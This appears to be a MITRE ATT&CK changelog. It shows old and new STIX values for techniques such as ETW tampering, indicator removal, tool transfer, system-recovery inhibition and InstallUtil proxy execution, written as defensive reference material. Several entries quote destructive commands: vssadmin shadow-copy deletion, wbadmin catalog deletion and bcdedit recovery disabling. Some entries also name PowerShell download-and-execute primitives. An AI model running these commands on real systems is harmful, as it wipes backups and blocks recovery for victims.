| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-571 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-13 15:56:04.897000+00:00 | 2022-06-30 16:44:16.962000+00:00 |
| description | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. |
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). |
| external_references[1]['source_name'] | capec | LemonDuck |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/571.html | https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ |
| x_mitre_data_sources[1] | Sensor Health: Host Status | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Sensor Health: Host Status |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/571.html', 'external_id': 'CAPEC-571'} |
| Old Description | New Description |
|---|---|
| Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform. Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-27 15:23:52.099000+00:00 | 2022-10-21 16:12:54.457000+00:00 |
| name | Indicator Removal on Host | Indicator Removal |
| description | Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. | Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform. Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred. |
| x_mitre_data_sources[0] | Process: Process Creation | Process: OS API Execution |
| x_mitre_data_sources[1] | File: File Deletion | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Modification | File: File Deletion |
| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Deletion | Command: Command Execution |
| x_mitre_data_sources[5] | Process: OS API Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | Command: Command Execution | File: File Metadata |
| x_mitre_data_sources[7] | Network Traffic: Network Traffic Content | Firewall: Firewall Rule Modification |
| x_mitre_data_sources[8] | User Account: User Account Authentication | Scheduled Job: Scheduled Job Modification |
| x_mitre_data_sources[9] | File: File Metadata | Process: Process Creation |
| x_mitre_version | 1.2 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Blake Strom, Microsoft 365 Defender | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Deletion | |
| x_mitre_data_sources | User Account: User Account Authentication | |
| x_mitre_platforms | Network | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | Google Workspace |
| Description |
|---|
| Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems. A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:03:09.766000+00:00 | 2022-04-28 16:07:48.062000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:09:22.559000+00:00 | 2022-05-05 05:06:38.938000+00:00 |
| external_references[1]['source_name'] | VectorSec ForFiles Aug 2017 | Evi1cg Forfiles Nov 2017 |
| external_references[1]['description'] | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. |
| external_references[1]['url'] | https://twitter.com/vector_sec/status/896049052642533376 | https://twitter.com/Evi1cg/status/935027922397573120 |
| external_references[2]['source_name'] | Evi1cg Forfiles Nov 2017 | RSA Forfiles Aug 2017 |
| external_references[2]['description'] | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. | Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. |
| external_references[2]['url'] | https://twitter.com/Evi1cg/status/935027922397573120 | https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe |
| external_references[3]['source_name'] | RSA Forfiles Aug 2017 | VectorSec ForFiles Aug 2017 |
| external_references[3]['description'] | Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. |
| external_references[3]['url'] | https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe | https://twitter.com/vector_sec/status/896049052642533376 |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control by file name or path |
| Old Description | New Description |
|---|---|
| Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['John Page (aka hyp3rlinx), ApparitionSec'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 15:42:48.595000+00:00 | 2022-05-20 17:38:35.985000+00:00 |
| description | Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | File: File Creation |
| x_mitre_detection | Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) | Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) |
| x_mitre_version | 2.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 't1105_lolbas', 'description': 'LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.', 'url': 'https://lolbas-project.github.io/#t1105'} | |
| external_references | {'source_name': 'PTSecurity Cobalt Dec 2016', 'description': 'Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.', 'url': 'https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf'} | |
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| Old Description | New Description |
|---|---|
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'root', 'SYSTEM', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:33:52.512000+00:00 | 2022-04-19 23:26:59.186000+00:00 |
| description | Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
| external_references[1]['source_name'] | Talos Olympic Destroyer 2018 | FireEye WannaCry 2017 |
| external_references[1]['description'] | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html |
| external_references[2]['source_name'] | FireEye WannaCry 2017 | Talos Olympic Destroyer 2018 |
| external_references[2]['description'] | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
| Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-24 18:21:08.497000+00:00 | 2022-03-08 21:05:20.658000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_data_sources[1] | Driver: Driver Load | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[4] | File: File Modification | Process: Process Metadata |
| x_mitre_data_sources[5] | Process: Process Metadata | Driver: Driver Load |
| Old Description | New Description |
|---|---|
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:34:46.529000+00:00 | 2022-03-11 18:47:52.603000+00:00 |
| description | Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:48:30.432000+00:00 | 2022-03-11 20:23:23.122000+00:00 |
| description | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) | Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019) |
| external_references[1]['source_name'] | Fireeye Hunting COM June 2019 | Linux IPC |
| external_references[1]['description'] | Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019. | N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html | https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_data_sources[2] | Script: Script Execution | Process: Process Access |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'} | |
| x_mitre_data_sources | Script: Script Execution | |
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
